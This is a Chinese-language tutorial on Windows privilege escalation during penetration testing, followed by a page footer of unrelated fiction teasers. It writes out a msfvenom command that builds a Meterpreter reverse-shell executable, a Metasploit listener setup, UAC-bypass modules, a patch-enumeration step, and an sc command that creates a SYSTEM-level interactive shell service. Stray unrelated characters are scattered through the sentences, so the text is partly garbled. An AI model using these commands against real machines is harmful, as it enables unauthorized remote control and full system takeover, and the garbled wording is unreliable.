滲透測(cè)試之內(nèi)網(wǎng)提權(quán)


UAC介紹

UAC(User Account Control)是微軟在 Windows Vista 以后版本引入的一種安全機(jī)制,通過(guò) UAC阀参,應(yīng)用程序和任務(wù)可始終在非管理員帳戶的安全上下文中運(yùn)行肝集,除非管理員特別授予管理員級(jí)別的系統(tǒng)訪問(wèn)權(quán)限。

當(dāng)前獲得的權(quán)限是存在于管理員組的時(shí)候但是并且是administrator這個(gè)用戶蛛壳,此時(shí)就可能需要我們進(jìn)行繞過(guò)UAC的操作杏瞻,否則雖然是管理員組但是實(shí)際上并沒(méi)有管理員所對(duì)應(yīng)的高權(quán)限操作,這個(gè)時(shí)候就需要bypass uac

木馬生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe -o payload.exe

本地監(jiān)聽(tīng)

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 10.0.0.217

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit


開(kāi)始提權(quán)

getsystem


提權(quán)失敗? ?一般都是上面說(shuō)的uac的問(wèn)題? 常識(shí)??bypass uac

輸入background? ?讓該會(huì)話在后臺(tái)運(yùn)行? 不在這個(gè)模式下 沒(méi)辦法調(diào)用msf的提權(quán)模塊

使用提權(quán)工具

use exploit/windows/local/ask


set SESSION 2(這個(gè)session要和之前監(jiān)聽(tīng)的那個(gè)session一樣? 否則不成功)

set TECHNIQUE up.exe

set TECHNIQUE EXE

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.107

show options

sessions -i

exploit

或者使用

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection


使用漏洞提權(quán)

use post/windows/gather/enum_patches


需要設(shè)置一下session


如果目標(biāo)系統(tǒng)安裝了安全更新的話是無(wú)法提權(quán)成功的


出現(xiàn)這種情況就是無(wú)法成功提權(quán)? 可利用的漏洞都被打上補(bǔ)丁了

或者漏洞編號(hào):ms11-080

sc命令提權(quán)

windows 7、8衙荐、08捞挥、12、16下可以成功? 2003也可以

關(guān)于sc命令:

SC 是用于與服務(wù)控制管理器和服務(wù)進(jìn)行通信的命令行程序忧吟。提供的功能類似于“控制面板”中“管理工具”項(xiàng)中的“服務(wù)”砌函。

sc Create syscmd binPath= “cmd /K start” type= own type= interact

這個(gè)命令的意思是創(chuàng)建一個(gè)名叫syscmd的新的交互式的cmd服務(wù)

然后執(zhí)行

sc start systcmd,就得到了一個(gè)system權(quán)限的cmd環(huán)境

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末溜族,一起剝皮案震驚了整個(gè)濱河市讹俊,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌煌抒,老刑警劉巖仍劈,帶你破解...
    沈念sama閱讀 216,997評(píng)論 6 502
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異寡壮,居然都是意外死亡贩疙,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,603評(píng)論 3 392
  • 文/潘曉璐 我一進(jìn)店門况既,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)这溅,“玉大人,你說(shuō)我怎么就攤上這事棒仍”ィ” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 163,359評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵降狠,是天一觀的道長(zhǎng)对竣。 經(jīng)常有香客問(wèn)我庇楞,道長(zhǎng),這世上最難降的妖魔是什么否纬? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,309評(píng)論 1 292
  • 正文 為了忘掉前任吕晌,我火速辦了婚禮,結(jié)果婚禮上临燃,老公的妹妹穿的比我還像新娘睛驳。我一直安慰自己,他們只是感情好膜廊,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,346評(píng)論 6 390
  • 文/花漫 我一把揭開(kāi)白布乏沸。 她就那樣靜靜地躺著,像睡著了一般爪瓜。 火紅的嫁衣襯著肌膚如雪蹬跃。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 51,258評(píng)論 1 300
  • 那天铆铆,我揣著相機(jī)與錄音蝶缀,去河邊找鬼。 笑死薄货,一個(gè)胖子當(dāng)著我的面吹牛翁都,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播谅猾,決...
    沈念sama閱讀 40,122評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼柄慰,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了税娜?” 一聲冷哼從身側(cè)響起坐搔,我...
    開(kāi)封第一講書(shū)人閱讀 38,970評(píng)論 0 275
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎敬矩,沒(méi)想到半個(gè)月后薯蝎,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,403評(píng)論 1 313
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡谤绳,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,596評(píng)論 3 334
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了袒哥。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片缩筛。...
    茶點(diǎn)故事閱讀 39,769評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖堡称,靈堂內(nèi)的尸體忽然破棺而出瞎抛,到底是詐尸還是另有隱情,我是刑警寧澤却紧,帶...
    沈念sama閱讀 35,464評(píng)論 5 344
  • 正文 年R本政府宣布桐臊,位于F島的核電站胎撤,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏断凶。R本人自食惡果不足惜伤提,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,075評(píng)論 3 327
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望认烁。 院中可真熱鬧肿男,春花似錦、人聲如沸却嗡。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,705評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)窗价。三九已至如庭,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間撼港,已是汗流浹背坪它。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,848評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留餐胀,地道東北人哟楷。 一個(gè)月前我還...
    沈念sama閱讀 47,831評(píng)論 2 370
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像否灾,于是被迫代替她去往敵國(guó)和親卖擅。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,678評(píng)論 2 354